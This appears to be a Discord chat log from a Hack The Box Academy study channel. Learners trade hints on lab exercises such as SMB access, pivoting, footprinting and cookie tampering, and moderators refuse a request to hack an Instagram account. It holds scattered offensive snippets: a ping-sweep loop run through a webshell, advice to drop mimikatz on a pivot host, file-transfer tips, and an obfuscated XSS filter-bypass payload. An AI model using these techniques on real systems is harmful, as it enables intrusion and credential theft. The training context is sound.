samba likes to hide info

so the error is expected?

I didnt get an error, I just go no output at all, which can be normal yeah

did u use the -d flag?

nah

with -d yeah I do see the error

but yeah normal for samba

any idea on this? i actually need this to work

what were you trying to run

get flag.txt

send us a image of the directory where the flag is

@sturdy kite

try : get ./flag.txt

get flag.txt flag.txt

?¿

this?

wtf

lol

try get /flag/flag.txt

are you connected as the correct user for that?

bob

what directory are you launching smbclient from

users

and do you have write access to users

how can i determine this?

launch it from ur user

directory

youre launching from /root

as normal user

youre not gunna have write perms to /root

cd ~

ohhhhhhhh

or use sudo

ughhhh

yup

thanks guys

._.

launched from bad dir 😅

np Ive done it before while inside /opt/ and using some tools

i got that mistake often too

xD

what a misleading error message lol

well it did say it had an error with the local file lol

yeah

that was confusing

but local is the remote when in smbclient right?

¯_(ツ)_/¯

lmao

anyways, thanks

anyone have a good resource where i can filter lists? trying to filter a list to delete lines with no special characters

What do you mean?

like a command line tool to filter output from a file?

``` i am filtering a list to meet specific requirements... but there are lines with no special characters in there and i want to delete them

i've heard of awk https://www.gnu.org/software/gawk/manual/gawk.html

i think grep is essentially the same thing, really it sounds like you are looking for a pattern (regex) to match lines with special chars

yea im filtering it based off password requirements

i would just search for regex patterns that fit what you want

you can use https://regex101.com/ to test

thanks!

I know a bit but this kinda sus ngl

Illegal stuff isn't allowed here.

<@&861185840277487616>

No and learn OPSEC.

https://tenor.com/view/summoned-i-have-been-summoned-power-gif-15859341

Go to hackthebox academy.

https://tenor.com/view/nap-time-cleaning-club-penguin-gif-15699358

Thank you NightWolf56

https://tenor.com/view/eye-bleach-gif-25796868

https://tenor.com/view/dab-reporter-gif-18923264

Welp thats the xss module down. Plus side I hate xss so it being really simple made it easy to blitz through. Downside is that it was super simple and did nothing to alter my annoyance at xss.

Gj!!!!

almost at that 70% mark

For cbbh or CPTS?

cpts

Nice!!!

I am at 82% but FInals week at uni is killing me

I have no time

how do you find php.ini files on websites

with file inclusion attack

If I understand the question correctly then FFUF is your friend

don't use gobuster no matter what people tell you : )

ive been trying ffuf for 2 days

im on https://academy.hackthebox.com/module/23/section/622

the problem is i cant find the parameter

http://10.129.29.112/index.html?PARAMETER=value

Damn I haven't done that module in a while

And my notes suck : (

welp thats the module Im about to start so maybe ill have something later

but odd that finding the paremeter is the sticking point

Is this for question 1?

I feel kind of stupid right now not being able to find a php.ini file

yes

oh this one isnt even finding the paremeter

you ssh in

and find it on the box

The format of your answer will be /xxx/xxxx/xx/xxxxxx/php.ini

oh

shit

bruh

i thought i had to

fuzz

Does that help my dude?

the whole time

no fuzz lol

the second question has you editing the file

ok i did the first question

The script in INTRODUCTION TO BASH SCRIPTING / Flow Control - Loops throws the following error for me. Is that a result of the incorrect salt being passed, or is something incorrectly configured in pwnbox?

*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
140356658070848:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:610:

^ scratch that. It was just an incorrect salt value.

Nice Job

exit

Hi

has anybody done the socksoverrdp thing in pivoting tunneling ?

when I unzip the SocksOverRDP directory the .dll file keeps disappearing from the pivot...

nvm defender was deleting it

I'm doing well

aight could someone help me w/ socksoverrdp? I can't get it to work and I don't understand what I'm doing wrong

I'm doing well

I think I misconfigured proxifier because it doesn't seem to detect mstsc's attempt to connect

but I can't figure out what I did wrong

no one?

Which module is that?

What exactly is your issue?

I think I don't understand how to connect to the machine that has the flag

what address am I supposed to use in mstsc.exe?

Enumerate that service further. Hint: ||check the banner||

My notes are weird for that one, but the way it goes is foothold machine -> ping sweep network to find hosts -> connect to new host; repeat

DM me if you need more help

DM me what you found

yo

I'm trying to run for i in {1..254} ; do (ping -c 1 172.16.5.$i | grep "bytes from" & );done through a webshell

but for some reason it doesn't loop, $i just takes {1..254} as a value

any ideas why?

I am stuck also there 😩 run rpcclient with user/pass and the group its assigned, it doesn't match the answer

What shell are you using?

it's alright i found a workaround

Cool

Anyone here read "hacking the art of exploitation" 2nd edition ? And is it good for starting to get into hacking ?

It's probably good if you like learning from books
There are definitely better resources tho

can you send me some of the better resources ?

Hi all, Im doing ICMP Tunneling with SOCKS section in Pivoting, Tunneling, and Port Forwarding Module, and when I transfer ptunnel-ng to ubuntu server, it gives me this error: ./ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory
Any hint?

This is necessary to complete the exercise

Any of the reputable ones are great: HTB, HTB Academy, THM, Cyber Mentor, PortSwigger, and probably many more, but these come to mind right now.
As for books, that depends on what you're after, and I don't really know many, but Network Security Assessment is really good, and I've seen a few others recommended

I had another issue with the tool, and I couldn't get it to work. You can, however, complete the exercise in other ways

yep, thats what I did

Who can hack instagram accounts?

Can someone help explain some bash scripting to me?

Introduction to Bash Scripting -> Conditional Execution

Got the answer, but could use someone experienced to help explain how the loop works

Malicious request that 🤨

DM me

No no my gf lost her instagram

Riiiight ahahaha

Could you do that

We both know this is not true

if you are not here to learn then it's not the right place for you

Ok fuck that she just cheated on me

if she did there are multiple legit ways get it back

the gf or the instagram?

Noo no she cheated on me and we break up

The gf

Haha

Look, we are not going to help or give advice on illegal activities

Bur you know how?

https://tenor.com/view/waynes-world-gif-9423140

++kick 1007292874402037870 continued asking for help in illegal activities

Mos got the boot!

try this beofer uploading the tool to the ubuntu server this work for me and yep the first time i also use a different way to complete this section git clone https://github.com/utoni/ptunnel-ng.git;cd ptunnel-ng;sudo ./autogen.sh

is there a "good" way of getting files from a machine you pivoted to back to your host? Or do I have to upload them back to the pivot then to my host?

asking for the pivoting tunneling skills assessment

you could use wget, curl

or netcat

lots of ways

https://gtfobins.github.io/#+file upload

all of these commands allow to upload a file

but would that work? since my machine and the host aren't on the same network?

in that network you have to go through multiple machine

maybe it's a dumb question sorry 😅

or you can upload ||mimikatz|| to that machine

uploading with internet connection you can use transfer.sh or something

ah man that's what i was looking for!!

i remembered pypykatz but the machine doesn't have python on it

you have a shell in the machine?

using what

i have rdp to the machine

how are you connected?

nvm

i bet with autoroute and proxychains

oh nice, not the best for privacy but good for ctf (with internet) thanks

rpivot

and proxychains

mimikatz throws errors 😦

well, machine died anyway time fro a break

@pliant sage if rpivot works tell me

oh rpivot definetly works

@pliant sage ok, rpivot did not work on my side so i had to use another method

for the client on the pivot I used the pre-built one, not the github cloned one

hello all. how do I navigate to the academy footprinting medium lab questions here on discord ?

There's no module-specific channels, but you can use the search functionality of discord

thx will do

Dm if you need help

hey guys i need help with the footprinting easy lab. So ive done the enumeration and i got back 2 ftp ports. If i try to connect via ftp user@<ip> and then login it directly enters passive mode and . With wget i got the folder .ssh which has my public and private key. Now i have to give the public key to the ssh but how?? Thanks for any help.

forget what i said rpivot is making xfreerdp run as smoothly as sandpaper it's a nightmare

@pliant sage so it took time to work

first pls remove the port and some spoiler stuff and for the ftp try ftp IP and you can enter the cred in and for the ssh if you got the private key you can just use that to login

so i have to upload my public key via ftp to the server

nope you don't need to do that just get the ||private key|| and use that to login

but how??

by login to ftp first

if i go for ssh -i id_rsa.pub ceil@<ip> that doesnt work

i already have the keys

you can't use public key for that

which key do i have to upload?

my private key?

then use the one without the .pub to login

not your the one you get on the ||ftp||

jes i did

lets go private chat maybe

did it give you any error?

no connection refused

oh yeah i forgot about spoiler

private chat?

yep shoot me a dm

did

me too, now I am having problems with .dll about SocksOverRDP:

all i remember about that error is it just randomly appear and disappear

but i'll give that a check after i'm done helping some people

I will reset the target

make sure that you are executing the cmd prompt as an admin

also the ||AV|| for that machine is on

@rustic sage oh yeah i think this is the issue

Also make sure something on the system hasnt quarantined the file.

still AV warning

Real time protecion was enabled xd

now it is working

Good day colleagues, I'm lost in the last Windows fundamentals test.

hi

what's the issue?

I couldn't solve the last test I'm stuck with the final questions

I don't understand what i miss in this module to have this response. Can someone help me ? https://academy.hackthebox.com/module/143/section/1486

you need to replace the <password here> with wley's actual password

Ho ok thanks !

normal that used ||theme for rev shell|| at getting started?

at windows fundamantals section ntfs vs share permissions first question - isn´t the anwsser ||Server Message Block protocol||? But it says its wrong

One second, I might be able to help

DM Me if you still need help

On the PtT w/ Linux module and trying to figure out how to switch from carlos to the svt_workstations account. I’ve used kinit to transfer the ticket and keytabextract, which gave me the AES-256 hash, but not NTLM. I’ve not been able to crack the AES-256 hash so far. Any recommendations?

Nevermind. Tried keytabextract on the ._all.kt file and it gave me an NTLM hash.

Hello Guys, can anyone help me on Password Attack module

Pass the Ticket on Linux

Cannot

I've sent a request

One question, once a module is finished and a subscription is expired. Can I keep watching the updated content added to that module?

If you have complete the module, yes.

I have a question, about "shells & payloads - live engagement". There is any browser on the machine we are connected via rdp? Or we have to proceed, without browser?

Is there anything specific to cloud security? Like a road map or something

Always good to be mindful of AV in the real world as well.

@gilded violet https://cloudsecuritypodcast.tv/season-2/cloud-security-roadmap/

Thank you so much

@gilded violet no problem

i cannot for the life of my figure out this password for the broken authentication module skills assessment. i either suck at filtering lists or i am deep in a rabbit hole

I am working on the brute forcing cookies section. I am stuck on the second question: Log in to the target application and tamper the rememberme token to give yourself super user privileges. After escalating privileges, submit the flag as your answer. can you help me out if you have done it? i feel like im just being really stupid

I can find the cookie to decode, decode it from url and notice that it there are 2 parts, one that changes based on session on that I think is the username encoded somehow. I for the life of me cant figure out where to go from there

if you having issue decoding the cookie just use CyberChef if you have decode the cookie change you can use the same role at ||question 1||

hint you aren't in a rabbit hole that's the right path ||if you got the right user|| and if you are having issue with filtering the wordlist re-check the section on that

@vital adder do u have notes about ACTIVE DIRECTORY ENUMERATION & ATTACKS / Bleeding Edge Vulnerabilities/ PetitPotam (MS-EFSRPC) attack?

nope (haven't done the module)

thank you.

okey, im having as problem with the last type of attack its not necessary to complete the section but i want to try it :/

i must admit, im quite lost, can I have another hint? the magic bytes dont seem to line up, Is it the same fomula as shown in the module?

hey. not academy stuff but i can't write to the main channel so. what should i try i this doesn't go thrgough the xss filter?
<img/src="funny.jpg"onload=java
script:eval(ale&#x0Drt('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))>

omfg jk, you just have to let the ai do the work, i figured it out